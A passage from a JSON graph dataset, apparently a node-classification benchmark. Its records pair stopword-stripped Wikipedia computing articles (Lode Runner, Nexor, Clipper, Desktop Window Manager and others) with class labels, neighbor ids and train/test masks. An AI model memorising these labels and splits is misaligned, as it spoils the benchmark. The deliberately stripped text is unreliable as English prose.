pl/i none number reserved words language little “ powerful ” language cobol designed 1950s business language made self-documenting using english-like structural elements verbs clauses sentences sections divisions c hand written terse syntactically get text screen example compare equivalent blocks code c cobol calculate weekly earnings pure prolog logic expressed terms relations execution triggered running queries relations constructs loops implemented using recursive relationships three languages solve types “ problems ” even though differing numbers reserved words “ power ” relates belonging set turing-complete languages definition reserved words language raises problems language may difficult new users learn long list reserved words memorize ca n't used identifiers may difficult extend language addition reserved words new features might invalidate existing programs conversely overloading existing reserved words new meanings confusing porting programs problematic word reserved one system/compiler might reserved another microsoft ’ .net common language infrastructure cli specification allows code written 40+ different programming languages combined together final product identifier/reserved word collisions occur code implemented one language tries execute code written another language example visual basic.net library may contain class definition class definition visual basic.net public class end class compiled distributed part toolbox c programmer wishing define variable type “ codice_57 ” would encounter problem codice_58 reserved word c thus following compile c // using class c x new // wo n't compile similar issue arises accessing members overriding virtual methods identifying namespaces resolved stropping order work around issue specification allows programmer c place at-sign identifier forces considered identifier rather reserved word compiler // using class c x new // compile consistency usage also permitted non-public settings local variables parameter names private members",
    "neighbors": [
      512,
      5635,
      3462,
      6536,
      2316,
      2062,
      9871,
      10510,
      155,
      7710,
      3999,
      5677,
      5428,
      8628,
      8502,
      1724,
      9665,
      10953,
      1611,
      7889,
      11474,
      3923,
      380,
      3164,
      6502,
      8554,
      6640,
      10739,
      3573,
      2936,
      2556,
      2045,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 6103,
    "label": 5,
    "text": "Registration_Data_Access_Protocol:registration data access protocol registration data access protocol rdap computer network communications protocol standardized working group internet engineering task force 2015 experimental developments thorough discussions successor whois protocol used look relevant registration data internet resources domain names ip addresses autonomous system numbers whois essentially retrieves free text rdap delivers data standard machine-readable json format order accomplish goal output operative whois servers analyzed taking census labels used rdap designers many members number name registries strove keep protocol simple possible since complexity considered one reasons previous attempts crisp failed rdap based restful web services error codes user identification authentication access control delivered http biggest delay getting rdap done turned bootstrap figuring server top level domain ip range asn range iana agreed host bootstrap information suitable registries publish well-known location urls json format registries started empty gradually populated registrants domains address spaces provide rdap server information iana number registries arin set public rdap service also features bootstrap url similar whois name registries icann requires rdap compliance since 2013",
    "neighbors": [
      8204,
      11221,
      2887
    ],
    "mask": "Test"
  },
  {
    "node_id": 6104,
    "label": 2,
    "text": "EmuTOS:emutos emutos replacement tos operating system atari st successors released free software mainly intended used atari emulators clones hatari firebee emutos provides support modern hardware avoids use old proprietary tos usually difficult obtain unlike original tos latest emutos work sometimes limited support atari hardware even amiga computers support features available coldfire cpu ide fat partitions emulators native features support support lacks deprecated os apis though line-a api functions included design emutos lacks support non-documented os features support atari falcon sound matrix dsp support missing vdi supports 1- 2- 4- 8-bit interleaved graphics modes support atari falcon amiga 16-bit resolutions completely missing therefore certain old games demos applications also falcon-specific software may work release 0.9.1 support firebee evaluation boards 256 colours display videl systems xbios dma sound functions emucon2 shell tab completion renaming folders added full-featured desktop included also smallest 192k rom version release 0.9.2 bugfix release 0.9.3 support sd/mmc cards external ide connector poweroff functions firebee platform compactflash used ide media handling fat partition media change detection enhanced fixes improvements emutos-ram booting fvdi compatibility general vdi speed acsi xhdi support see atari tos release 0.9.4 compiled -o2 default better performance except 192k version use less ram add new variant coldfire evaluation boards bas_gcc bios desktop display text files move files/folders control key release 0.9.5 fix issues steem emulator hard disk emulation add alt+arrow mouse emulation pexec mode 7 support dual keyboard support user specify boot partition startup recovery exceptions user programs stack initialization amiga translated text object alignment improvements support line-a functions completed release 0.9.6 fixes real tt hw full vdi support atari tt video resolutions enable midi input add emucon 'mode command support etv_term function many fixes release 0.9.7 support extended mbr partitions monster board eiffel bus coldfire evb apollo core 68080 freemint support non-atari hardware desktop 'install devices 'install icon 'remove desktop icon features standalone version emucon2",
    "neighbors": [
      2179,
      8262,
      7849,
      178,
      2290,
      6100,
      11221,
      1530
    ],
    "mask": "Test"
  },
  {
    "node_id": 6105,
    "label": 4,
    "text": "European_Information_Technologies_Certification_Academy:european information technologies certification academy european information technologies certification academy eitca programme international professional ict knowledge skills certification standard developed governed eitci institute – non-profit organization based brussels provides certification individuals knowledge skills broad field-oriented areas ict expertise computer graphics information security etc eitca programmes referred eitca academies include selected sets several dozen individual eitc programmes together comprise particular area qualifications june 2015 eitca certification standard includes following academies",
    "neighbors": [
      10307,
      357,
      9607,
      8462,
      5010,
      6099,
      1493,
      3447
    ],
    "mask": "None"
  },
  {
    "node_id": 6106,
    "label": 3,
    "text": "Duncan's_Taxonomy:duncan taxonomy duncan taxonomy classification computer architectures proposed ralph duncan 1990 duncan proposed modifications flynn taxonomy include pipelined vector processes taxonomy developed 1988-1990 first published 1990 original categories indicated category includes parallel architectures coordinate concurrent execution lockstep fashion via mechanisms global clocks central control units vector unit controllers subdivision category made primarily basis synchronization mechanism pipelined vector processors characterized pipelined functional units accept sequential stream array vector elements different stages filled pipeline processing different elements vector given time parallelism provided pipelining individual functional units described well operating multiple units kind parallel chaining output one unit another unit input vector architectures stream vector elements functional units special vector registers termed register-to-register architectures feed functional units special memory buffers designated memory-to-memory architectures early examples register-to-register architectures 1960s early 1970s include cray-1 fujitsu vp-200 control data cyber 205 texas instruments advanced scientific computer early examples memory-to-memory vector architectures late 1980s early 1990s saw introduction vector architectures cray y-mp/4 nippon electric corporation sx-3 supported 4-10 vector processors shared memory see nec sx architecture scheme uses simd single instruction stream multiple data stream category flynn taxonomy root class processor array associative memory subclasses simd architectures characterized control unit broadcast common instruction processing elements execute instruction lockstep diverse operands local data common features include ability individual processors disable instruction ability propagate instruction results immediate neighbors interconnection network systolic arrays proposed 1980s multiprocessors data partial results rhythmically pumped processor processor regular local interconnection network systolic architectures use global clock explicit timing delays synchronize data flow processor processor processor systolic system executes invariant sequence instructions data results pulsed neighboring processors based flynn multiple-instruction-multiple-data streams terminology category spans wide spectrum architectures processors execute multiple instruction sequences potentially dissimilar data streams without strict synchronization although instruction data streams different processor need thus mimd architectures run identical programs various stages given time run unique instruction data streams processor execute combination scenarios category subdivided primarily basis memory organization mimd-based paradigms category subsumes systems specific programming execution paradigm least fundamental architectural design structural considerations thus design dataflow architectures reduction machines much product supporting distinctive execution paradigm product connecting processors memories mimd fashion category subdivisions defined paradigms",
    "neighbors": [
      9932
    ],
    "mask": "Test"
  },
  {
    "node_id": 6107,
    "label": 3,
    "text": "SPARC_T_series:sparc series sparc t-series family risc processors server computers based sparc v9 architecture originally developed sun microsystems later oracle corporation acquisition sun distinguishing feature earlier sparc iterations introduction chip multithreading cmt technology multithreading multicore design intended drive greater processor utilization lower power consumption first generation t-series processor ultrasparc t1 servers based announced december 2005 later generations introduced term series used refer entire family processors sun microsystems sun fire sparc enterprise product lines based early generations cmt technology ultrasparc t1 based sun fire t2000 t1000 servers launched december 2005 early 2006 respectively later rebranded match name ultrasparc t2 t2 plus based sun sparc enterprise t5**0 servers september 2010 oracle announced range sparc t3 processor based servers branded sparc t3 series sparc enterprise brand dropped sparc t3-series servers include t3-1b blade server module fits sun blade 6000 system t3 based servers rack mounted systems subsequent t-series server generations also include blade server sun blade 6000 form factor september 26 2011 oracle announced range sparc t4-based servers systems use chassis earlier t3 based systems main features similar exception march 26 2013 oracle announced refreshed sparc servers based new sparc t5 microprocessor company claims world fastest t5 range servers single socket rackmount server design deprecated new eight-socket rackmount server introduced october 26 2015 oracle announced family systems built 32-core 256-thread sparc m7 microprocessor unlike prior generations t- m-series systems introduced using processor sparc t-series servers partitioned using oracle logical domains technology additional virtualization provided oracle solaris zones aka solaris containers create isolated virtual servers within single operating system instance logical domains solaris zones used together increase server utilization",
    "neighbors": [
      9090,
      1539,
      4241,
      8863,
      8353,
      8994,
      8871,
      1707,
      2731,
      5677,
      9010,
      10675,
      9012,
      4664,
      10553,
      1594,
      9665,
      6338,
      6341,
      597,
      6107,
      731,
      2269,
      1755,
      1250,
      10340,
      11626,
      7022,
      8434,
      1399
    ],
    "mask": "None"
  },
  {
    "node_id": 6108,
    "label": 7,
    "text": "Integrated_Middleware_Platform:integrated middleware platform imp integrated middleware platform external system aiming service logic communication imp receives messages outside translates messages understandable scs way imp isolates external platform enhances communication efficiency safety way imp connect olc server csip server northbound interface",
    "neighbors": [
      8122
    ],
    "mask": "Test"
  },
  {
    "node_id": 6109,
    "label": 3,
    "text": "Lode_Runner:lode runner lode runner 2d fixed-screen platform game video game first published broderbund 1983 levels lode runner puzzle-oriented player controls one character must collect gold pieces level get end chased number enemies one first games include level editor original game number remakes spin-offs sequels published lode runner series different computers consoles different developers publishers tozai games currently holds copyright trademark rights prototype later became lode runner game developed douglas e. smith renton washington time architecture student university washington prototype called kong written prime computer 550 minicomputer limited one building uw campus shortly thereafter kong ported vax minicomputers terminals available campus game programmed fortran used ascii character graphics kong ported vax pascal sections mixed original fortran code one weekend 1982 smith able build crude playable version 6502 assembly language apple ii+ renamed game miner end year refined version black-and-white joystick support submitted rough version brøderbund around october 1982 received one-line rejection letter response effect thank submitting game concept unfortunately fit within product line miner like text-based kong predecessors simple animation characters move across screen block increments primitive acceptable commercial product brøderbund wanted detailed pixel-level movement smith new game would one first include level editor feature allows players create levels game according article smith given 10,000 advance brøderbund develop inter-square animation provide 150 levels play 2010 interview game designer john romero claimed smith added level editing function request neighborhood kids testing game ton levels designed ended final game smith borrowed money purchase color monitor joystick continued improve game around christmas 1982 submitted game renamed lode runner four publishers quickly received offers four sierra sirius synergistic brøderbund took deal brøderbund game released mid-1983 original microcomputer versions apple ii atari 8-bit family vic-20 commodore 64 ibm pc vic-20 version released cartridge even including level editor commodore 64 disk cartridge release latter 32 levels ibm version originally self-booting disk incompatible video cards cga later pc release appeared 1986 runs video card port original 128k macintosh followed 1984 run machines os 6 also used system 7 patch versions include atari st sinclair spectrum 48k/128k licensed version msx computer published ascii corporation sega sg-1000 nes windows 3.1 macintosh original game boy nes version released hudson soft 1984 north american release 1986 became one earliest third-party games made system 50 levels scrolling screens added music graphics redone cartoon-like style addition fruits vegetables randomly appear may grabbed additional points although level editor included way save levels created arcade game lode runner produced added features like ability hang ends ladders improved enemy ai brøderbund released special enhanced version championship lode runner 1985 50 levels much higher difficulty original company offered commemorative certificate anyone could submit proof beaten entire game submitted proof purchase show copy game pirated ported apple atari c64 msx pc well nes although version reach north america atari 8-bit version lode runner converted cartridge re-released atari corporation 1987 one series releases atari xegs console version contains 150 levels level editor required disk drive player controls stick figure must collect gold level avoiding guards try catch player collecting gold player must reach top screen reach next level 150 levels game progressively challenge players problem-solving abilities reaction times levels feature multi-story brick platform motif ladders suspended hand-to-hand bars offer multiple ways travel throughout player dig holes floors temporarily trap guards may safely walk atop trapped guards guard carrying bar gold falls hole left behind retrieved player time floors dug regenerate filling holes trapped guard escape hole fills consumed immediately respawning random location top level unlike guards player character may climb hole killed fills escape means floors may also contain trapdoors player guards fall bedrock player dig notably player dig hole sides directly underneath introduces important strategy digging hole x blocks deep player must first dig gap least x wide able dig number spaces shrink layer player needs least one free adjacent space able dig however exceptions rule arise player digs position standing ladder hanging hand-to-hand bar allows player repeatedly dig descend one row kind digging involved solving many levels player starts five lives level completion awards extra life guard catch player one life subtracted current level restarts player character fall arbitrary heights without injury jump players trap pits escape abort level costing life begin guards simply home player always taking shortest path also move counter-intuitive ways according strange algorithm key factor game logic especially advanced levels exploiting behavior guards essential toward attaining solution sometimes player guard ladder instance guard move away player general depending exact positioning relative lode runner guards sometimes appear repelled behavior far random however big part mastering game involves developing intuition predict movement guards player may come contact guard directly stick figure feet touching guard head enables player walk guards temporarily stuck hole dug also possible make contact guard player free fall since player runs faster guards also falls faster moreover possible survive feet-to-head contact guard standing platform begins move forms contact necessary solve levels sometimes necessary liberate trapped guard digging standing head moving rapidly opposite direction guard begins marching freedom levels necessary use falling guard bridge reach otherwise unreachable area one subtlety movement initiated standing guard head briefly touching guard head free fall consequences fatal levels guards deliberately trapped various ways instance lured entering part level escape situations player liberate trapped guards digging levels collect gold pieces player must exploit guards collecting gold pieces positioned whichever figure collects become trapped guard collects piece becomes trapped player release guard later steal gold guard drops falls hole levels gold pieces collected killing guards trapping dug holes close deceased guards come back life locations near top screen may allow reach parts level reached player levels require careful ordering traversal divided zones connected passages impossible traverse reverse direction gold piece remains unreachable zone player may abort level start losing life unless way coax guard bringing gold game puzzles advanced levels time-sensitive player must dig order penetrate interior cavern collect gold quickly return way digging repairs enclosing lode runner cavern means escape puzzles require deliberate timing among digging actions lode runner must run previously dug-out tiles repaired enough time pass ones yet repaired lode runner successful broderbund second best-selling commodore game late 1987 sales surpassed 250,000 copies november 1989 computer gaming world held contest best reader-built level softline 1983 praised lode runner calling smooth thoughtful quite addictive magazine approved large number unique levels level editor possibilities astounding emphasis wits strategy violence computer gaming world praised lode runner unusually easy-to-use level editor strategy necessary arcade title describing one thinking men arcade games praises introduction strategy climbing game genre intuitive level editor repeated video magazine review game well praise graphics animation apple ii version described stand ing far ahead pack ahoy 1984 called game top-notch action game requires quick mind agile joystick easy-to-use game generator magazine concluded lode runner one best games available c-64 unconditionally wholeheartedly recommended pc magazine gave game 16.25 18 points magazine called game tour de force american ingenuity ... first release long long time honestly bear title 'computer game ... lode runner uses power pc create something much video version ping pong game requires thought magazine praised ibm pc version graphics increasingly difficult level design level editor commodore 64 home companion said lots education hidden level editor concluding lode runner one first new breed computer game lets player creator 1985 game still selling well video magazine reporting 6th best-selling recreational title march april year zzap 64 called commodore 64 version one recent games certainly one best ... classic long time come ... graphically minuscule aurally crude game sheer addiction kept eyes propped open owls went bed 1984 lode runner awarded 1984 computer game year 5th annual arkie awards judges praised outstanding design described fascinating irresistible thinking player climbing conquest softline readers named lode runner popular apple fourth most-popular atari program 1983 1993 spectrum version game voted number 37 sinclair official top 100 games time gamespot named lode runner one greatest games time 1996 computer gaming world declared lode runner 80th-best computer game ever released time 2010 rated lode runner 1 game 10 greatest games apple ii list orson scott card wrote compute 1989 editor first game let family express creativity gaming tetris designer alexey pajitnov claimed 2008 lode runner favorite puzzle game many years 1984 irem developed arcade conversion lode runner contained 24 remixed levels 150 original levels irem brought many arcade inspired levels famicom disk system names super lode runner super lode runner ii arcade version numerous sequels including several versions lode runner released u.s. lode runner twin power lode runner 1999 sfc vary gameplay mostly adding different characters scenarios another title battle lode runner originally exclusive japan made available 23 april 2007 first japan-only game appear nintendo virtual console service original lode runner followed june 2007 also cubic lode runner 3-d lode runner variant released japan nintendo gamecube playstation 2 nes version developed hudson soft marked first appearance bombermen opposing robots end screen bomberman nes notes original white bomberman turned human hints appearance another game lode runner behind japanese version reference direct congratulations bomber man becomes runner see lode runner japan famicom version lode runner allows editing creating levels share friends using famicom data recorder hudson soft also announced version lode runner nintendo ds released 2006 unreleased version game atari lynx discovered 2008 old atari corp. hard drive january 7 2008 remake lode runner developed tozai southend interactive announced ces '08 released april 22 2009 game features revamped 3d graphics additional game modes cooperative competitive multiplayer support six new block types level editor well live leaderboards timeline game history lode runner classic made available xbox live enhanced game windows phone 7 series phones july 18 2012 features graphics gameplay 150 levels original lode runner game january 17 2013 lode runner classic released ios android phones",
    "neighbors": [
      5762,
      9446,
      10855,
      8925,
      8524,
      6797,
      9006,
      10316,
      6109,
      7281,
      6546,
      10931,
      11604,
      3960,
      10010,
      477,
      7679
    ],
    "mask": "None"
  },
  {
    "node_id": 6110,
    "label": 4,
    "text": "Nexor:nexor nexor limited privately held company based nottingham providing product services safeguard government defence critical national infrastructure computer systems originally known x-tel services limited nexor limited founded 1989 x-tel services limited university nottingham ucl following research x.400 x.500 systems isode project 1992 stephen kingan joined business ceo 1993 x-tel services limited renamed nexor limited 1996 3i invested business launch nexor inc 2004 kingan nigel fasey acquired business 2008 colin robbins appointed board cto 2012 kingan acquired 100 ownership nexor october 2013 company moved headquarters nottingham science park ng2 business park nexor customers include nato european defence agency uk mod us dod canadian dnd foreign commonwealth office met office nexor designed deployed first public internet search engine aliweb associated robots exclusion standard nexor contributor internet engineering task force worked internet rfcs 1086 1165 1488 1606 1778 nexor developed microsoft exchange client unix nexor first organisation awarded intellect best practice certificate nexor run regular demonstrations coalition warrior interoperability demonstration nexor first organisation achieve tickitplus quality-management certification program software development nexor strategic partnerships boldon james qinetiq nexor data diode product supplied via oem relationship fox-it nexor supplier uk government g-cloud cloudstore official cyber security supplier uk government nexor 2013 dsei innovation challenge nexor contributor cyber champions community initiative promote best practices digital literacy online safety awareness schools youth organisations interest groups across uk nexor sponsor cyber security challenge designed promote careers cyber security nexor first batch companies achieve uk ’ cyber essential standard contributor industry launch partner pas754 software development standard led trustworthy software initiative 2015 nexor launched consulting arm qonex nexor primarily focused secure information exchange defence governments critical infrastructure products services include several nexor products evaluated common criteria scheme obtain independent verification claimed functionality including nexor contributor following collaborative research development projects paradise 1989-2002 piloting research directory osi environment part esprit cosine project establish pan-european computer-based network infrastructure enabled research workers communicate using osi later prefixed nameflow-paradise paradise implemented distributed x.500 systems across 700 dsas 30 countries project documented nameflow archive quipu major x.500 implementation used paradise implementations also came inria led christian huitema siemens dirx originating thorn project implementing ecma tr32 standard david goodman project manager maits multilingual application interface telematic services developed multilingual interfaces x.400 x.500 top paradise password 1993-1995 piloting secure service within osi r european community-sponsored value program comprising consortia france germany gmd darmstadt uk ucl nexor establish pilot security infrastructure network applications european research community consortium developed secured applications based x.509 including osisec pki primary application pem forerunner s/mime seeoti goodman ucl project manager joerg reichelt nexor lead engineer eurocoop 1991-1992 esprit iii project 5303 follow project eurocode 1992-1995 esprit iii project 6155 aimed develop powerful effective systems supporting distributed collaborative work partners included aarhus university gmd darmstadt rank xerox icl approach adopted integrate components number existing systems develop new collaborative tools based study large-scale technical application encompasses many collaboration problems single components tools developed integrated existing tools able interoperate icw closely related dti funded project pippa hennessy nexor project manager regis 1995–1998 collaborative project diamond cable communications university sheffield investigate problems inherent providing regional business communities low-cost high-speed access local information services robbins nexor project manager eu acts project renaissance 1995–97 led fretwell downing develop virtual vocational training environment university sheffield diamond cable communications yorkshire cable delivered uk national centre popular music harold combs nexor project manager igrc project 2010-2012 collaborative project hp assuria infogov cranfield university loughborough university birkbeck university london automate threat level control status changes real-time management complexity risk resilience secure information infrastructure cloudfilter 2012–13 epsrc collaborative project imperial college explore novel methods exercising control sensitive data propagation across multiple cloud providers project led 2ic deliver proof-of-concept demonstration cross domain tactical service bus. winning dsei innovation award 2013 project de montfort university research develop implement use hardware robust alternative software high assurance network security devices defence science technology laboratory dstl behalf uk ministry defence established programme realise potential benefits novel technology front line forces consortium led qinetiq called sirius comprising 40 organisations provides experience research capability csiis september 2014 nexor best research poster annual symposium uk information assurance advisory council iaac based csiis work many nexor employees current former made contributions internet business community including",
    "neighbors": [
      6337,
      2558,
      4806,
      5384,
      6054,
      8904,
      11470,
      1297,
      6110,
      10238,
      6648,
      3930,
      6651,
      8859,
      4573,
      1086
    ],
    "mask": "None"
  },
  {
    "node_id": 6111,
    "label": 7,
    "text": "Chrome_River_Technologies:chrome river technologies chrome river technologies american software-as-a-service company creates expense reporting supplier invoice automation software mid-size large commercial non profit organizations higher education institutions worldwide founded 2007 alan rich dave terry formerly executives thomson reuters elite los angeles-based company received several awards recognition including rankings inc. 5000 deloitte fast 500 los angeles business journal fast growth company headquartered sag-aftra plaza los angeles miracle mile chrome river co-founded alan rich dave terry 2007 rich originally started software company elite data processing father harvey rich 1988 company specializing similar field financial management systems renamed thomson elite acquired thomson corporation 2003 rich stepped thomson elite february 2007 founding chrome river march year chrome river first released market 2008 initially focusing law firms 2012 chrome river used almost half 100 largest law firms united states company began focus expanding general corporate market 2012 company took us 3 million investment fund expansion chrome river also announced first overseas expansion london 2012 january 2014 company received us 17 million capital bain capital ventures.. june 2015 equity firm great hill partners invested us 100 million company order grow company global presence company using capital accelerate development enterprise mobile technologies continue global expansion 35 million raised company 2018 2016 chrome river announced international expansion launch presence sydney 2018 company launched presence germany 2018 chrome river listed los angeles business journal fastest growing companies list inc. 500/5000 seven times deloitte fast 500 five times chrome river software focuses automating processes around expense reporting supplier invoice processing businesses focusing corporate expense management software offered software service company solution uses optical character recognition data extraction technologies extract categorize data images typically paper receipts html email receipts create line items expense reports chrome river ’ interface web app built using html5 featuring responsive web design rwd allows accessed via mobile web browser without need download mobile app company prosper product integrates company expense data sales data salesforce.com crm solution allowing sales finance teams visualize expense types influence sales managers deploy sales staff based upcoming travel plans company partners number financial institutions including u.s. bank western union business travel software providers including amadeus sabre expedia egencia corporate travel division yatra create solutions streamline process creating processing expenses 2018 analyst firm idc positioned chrome river leader marketscape analysis expense management software vendors chrome river customer base 1,000 organizations 2 million users across 115 countries company predominantly sells global 2000 fortune 500 organizations although also multiple small medium-sized enterprise non-profit customers result company ’ heritage legal industry chrome river used three-quarters amlaw 100 two-thirds global 100 law firms chrome river also 100 customers higher education result partnership education management software provider ellucian notable customers include cargill coca-cola hellenic bosch sabre corporation",
    "neighbors": [
      5857,
      10090,
      467
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6112,
    "label": 9,
    "text": "Clipper_(programming_language):clipper programming language clipper xbase compiler computer programming language used create software programs originally operated primarily ms-dos although powerful general-purpose programming language primarily used create database/business programs clipper created nantucket corporation company started 1984 barry rebell management brian russell technical 1992 company sold computer associates 190 million dollars product renamed ca-clipper clipper created replacement programming language ashton tate dbase iii popular database language time advantage clipper dbase could compiled executed ms-dos standalone application years 1985 1992 millions clipper applications built typically small businesses dealing databases concerning many aspects client management inventory management many smaller businesses clipper application designed specific needs first experience software development also lot applications banking insurance companies developed especially cases application considered small developed run traditional mainframes environments clipper also served front end existing mainframe applications product matured remained dos tool many years added elements c programming language pascal programming language well oop code-block data-type hybridizing concepts dbase macros string-evaluation function pointers become far powerful original nantucket aspen project later matured windows native-code visual objects compiler despite efforts early nineties new ownership clipper proved unable make smooth transition ms-dos microsoft windows era result almost new commercial applications written clipper 1995 four important languages took clipper visual basic microsoft access delphi powerbuilder existing clipper applications continued use ten fifteen years requiring regular maintenance around 2015 number clipper applications still used commercially daily basis small clipper language actively implemented extended multiple organizations/vendors like xbase++ alaska software flagship well free gpl-licensed projects like harbour xharbour many current implementations portable dos windows linux 32- 64-bit unix 32- 64-bit macos supporting many language extensions greatly extended runtime libraries well various replaceable database drivers rdd supporting many popular database formats like dbf dbtntx dbfcdx foxpro apollo comix advantage database server machsix six driver apollo sql newer implementations strive full compatibility standard dbase/xbase syntax also offering oop approaches target-based syntax sqlexecute clipper usenet newsgroups comp.lang.clipper comp.lang.clipper.visual-objects simple hello world application simple data base input mask various versions clipper nantucket corporation seasonal versions billed dbase compilers nantucket corporation clipper 5 computer associates ca-clipper 5 additional standard clipper library notable additional library named clipper tools developed ca beginning clipper production three versions library manufactured associated 5st clippers version library became de facto standard clipper clones xharbour also cloned number clipper clones manufacturers",
    "neighbors": [
      6147,
      4614,
      6797,
      10899,
      3350,
      2462,
      1952,
      5154,
      8868,
      10921,
      5546,
      10413,
      7983,
      823,
      8262,
      8393,
      4042,
      9166,
      847,
      2901,
      2903,
      987,
      6631,
      3435,
      2929,
      9714,
      5492,
      2045,
      5374
    ],
    "mask": "None"
  },
  {
    "node_id": 6113,
    "label": 7,
    "text": "Parallelization_contract:parallelization contract parallelization contract pact programming model generalization mapreduce programming model uses second order functions perform concurrent computations large petabytes data sets parallel similar mapreduce arbitrary user code handed executed pacts however pact generalizes couple mapreduce concepts apache flink open-source parallel data processing platform implemented pacts flink allows users specify user functions annotations parallelization contracts pacts data processing operators data flow therefore pact one data inputs one outputs pact consists two components figure shows components work together input contracts split input data independently processable subset user code called independent subsets calls executed parallel subsets independent optionally user code annotated additional information annotations disclose information behavior black-box user function pact compiler utilize information obtain efficient execution plans however missing annotation change result execution incorrect output contract produces wrong results currently supported input contracts annotation presented discussed following input contracts split input data pact independently processable subsets handed user function pact input contracts vary number data inputs way independent subsets generated formally input contracts second-order functions first-order function user code one input sets none key fields per input parameters first-order function called one multiple times subsets input set since first-order functions side effects call independent calls done parallel second-order functions map reduce mapreduce programming model input contracts context pact programming model map input contract works way mapreduce single input assigns input record subset hence records processed independently see figure \\\\ reduce input contract semantics reduce function mapreduce single input groups together records identical key fields groups handed whole user code processed see figure pact programming model also support optional combiners e.g partial aggregations \\\\ cross input contract works two inputs builds cartesian product records inputs element cartesian product pair records handed user code \\\\ match input contract works two inputs inputs matches records identical key fields come different inputs hence resembles equality join keys inputs attributes join matched pair records handed user code \\\\ cogroup input contract works two inputs well seen reduce two inputs input records grouped key reduce handed user code contrast match user code also called key one input pair see blue key example contrast mapreduce pact uses generic data model records pact record pass data functions pact record thought tuple free schema interpretation fields record user function key/value pair mapreduce special case record two fields key value input contracts operate keys like //reduce// //match// //cogroup// one specifies combination record fields make key arbitrary combination fields may used see query example programs defining //reduce// //match// contracts one fields written minimally move data fields record may sparsely filled i.e may fields //null// values legal produce record example fields 2 5 set fields 1 3 4 interpreted //null// fields used contract key fields may however null exception raised user code annotation optional pact programming model allow developer make certain behaviors her/his user code explicit optimizer pact optimizer utilize information obtain efficient execution plans however impact correctness result valid annotation attached user code hand invalidly specified annotations might cause computation wrong results following list current set available output contracts **constant fields** annotation marks fields modified user code function note every input record constant field may change content position output record case binary second-order functions cross match cogroup user specify one annotation per input **constant fields except** annotation inverse **constant fields** annotation annotates fields might modified annotated user-function hence optimizer considers **any annotated field constant** annotation used carefully binary second-order functions cross match cogroup one annotation per input defined note either constant fields constant fields except annotation may used input pact programs constructed data flow graphs consist data sources pacts data sinks one data sources read files contain input data generate records files records processed one pacts consisting input contract user code optional code annotations finally results written back output files one data sinks contrast mapreduce programming model pact program arbitrary complex fixed structure \\\\ figure shows pact program two data sources four pacts one data sink data source reads data specified location file system sources forward data respective pacts map input contracts user code shown figure output map pacts streams pact match input contract last pact reduce input contract forwards result data sink detailed comparison mapreduce pact programming models read paper // mapreduce pact comparing data parallel programming models // see page",
    "neighbors": [
      9179,
      11343
    ],
    "mask": "Test"
  },
  {
    "node_id": 6114,
    "label": 2,
    "text": "Desktop_Window_Manager:desktop window manager desktop window manager dwm previously desktop compositing engine dce window manager windows vista windows 7 windows 8 windows 10 enables use hardware acceleration render graphical user interface windows originally created enable portions new windows aero user experience allowed effects transparency 3d window switching also included windows server 2008 requires desktop experience feature compatible graphics drivers installed desktop window manager compositing window manager means program buffer writes data dwm composites program buffer final image comparison stacking window manager windows xp earlier also windows vista windows 7 windows aero disabled comprises single display buffer programs write dwm works different ways depending operating system windows 7 windows vista version graphics drivers uses wddm 1.0 1.1 windows 7 wddm 1.1 drivers dwm writes program buffer video ram even graphics device interface gdi program windows 7 supports limited hardware acceleration gdi need keep copy buffer system ram cpu write compositor access graphics applications easily allows visual effects string together visuals multiple applications transparency dwm uses directx 9 perform function compositing rendering gpu freeing cpu task managing rendering off-screen buffers display however affect applications painting off-screen buffers – depending technologies used might still cpu-bound dwm-agnostic rendering techniques like gdi redirected buffers rendering user interface ui bitmaps dwm-aware rendering technologies like wpf directly make internal data structures available dwm-compatible format window contents buffers converted directx textures desktop full-screen direct3d surface windows represented mesh consisting two adjacent mutually-inverted triangles transformed represent 2d rectangle texture representing ui chrome mapped onto rectangles window transitions implemented transformations meshes using shader programs windows vista transitions limited set built-in shaders implement transformations greg schechter developer microsoft suggested might opened developers users plug effects future release dwm maps primary desktop object 3d surface desktop objects including virtual desktops well secure desktop used user account control applications render off-screen buffer read buffer embedded applications well since off-screen buffer constantly updated application embedded rendering dynamic representation application window static rendering live thumbnail previews windows flip work windows vista windows 7 dwm exposes public api allows applications access thumbnail representations size thumbnail fixed applications request thumbnails size smaller original window size even larger dwm scale properly returning windows flip 3d use public thumbnail apis allow directly accessing direct3d textures instead flip 3d implemented directly dwm engine desktop window manager uses media integration layer mil unmanaged compositor shares windows presentation foundation represent windows composition nodes composition tree composition tree represents desktop windows hosted rendered mil back scene front since windows contribute final image color resultant pixel decided one window used implement effects per-pixel transparency dwm allows custom shaders invoked control pixels multiple applications used create displayed pixel dwm includes built-in pixel shader 2.0 programs compute color pixel window averaging color pixel determined window behind neighboring pixels shaders used dwm achieve blur effect window borders windows managed dwm optionally areas requested application since mil provides retained mode graphics system caching composition trees job repainting refreshing screen windows moved handled dwm mil freeing application responsibility background data already composition tree off-screen buffers directly used render background pre-vista windows oss background applications requested re-render sending codice_1 message dwm uses double-buffered graphics prevent flickering tearing moving windows compositing engine uses optimizations culling improve performance well redrawing areas changed compositor multi-monitor aware dwm natively supports full-screen applications games dwm perform window compositing therefore performance appreciably decrease windows 8 windows server 2012 dwm used times disabled due new start screen experience implemented since dwm process usually required run times windows 8 users experiencing issue process seeing memory usage decrease system reboot often first step long list troubleshooting tasks help possible prevent dwm restarting temporarily windows 8 causes desktop turn black taskbar grey break start screen/modern apps desktop apps continue function appear like windows 7 vista basic theme based single-buffer renderer used xp also use windows 8 centered title bar visible within windows preinstallation environment starting windows without dwm work lock screen requires dwm done fly practical purposes starting windows 10 disabling dwm way cause entire compositing engine break even traditional desktop apps due universal app implementations taskbar new start menu.unlike predecessors windows 8 supports basic display adapters windows advanced rasterization platform warp uses software rendering cpu render interface rather graphics card allows dwm function without compatible drivers level performance normal graphics card dwm windows 8 also adds support stereoscopic 3d rendering techniques dwm-aware output must redirected dwm buffers windows either gdi directx used rendering make two work dwm redirection techniques provided gdi used ui rendering technique microsoft windows application window notified part comes view job application render without dwm rendering rasterizes ui buffer video memory rendered screen dwm gdi calls redirected use canonical display driver cdd.dll software renderer buffer equal size window allocated system memory cdd.dll outputs buffer rather video memory another buffer allocated video memory represent directx surface used texture window meshes system memory buffer converted directx surface separately kept sync round-about route required gdi output directly directx pixel format surface read compositor composited desktop video memory writing output gdi system memory hardware accelerated conversion directx surface gdi window minimized invisible visible monitor full screen directx application limitation gdi gdi bitmap buffer longer received application requesting device context painting updating sometimes seen gdi operation copying one window another outputs black empty regions instead expected window content thus dwm uses 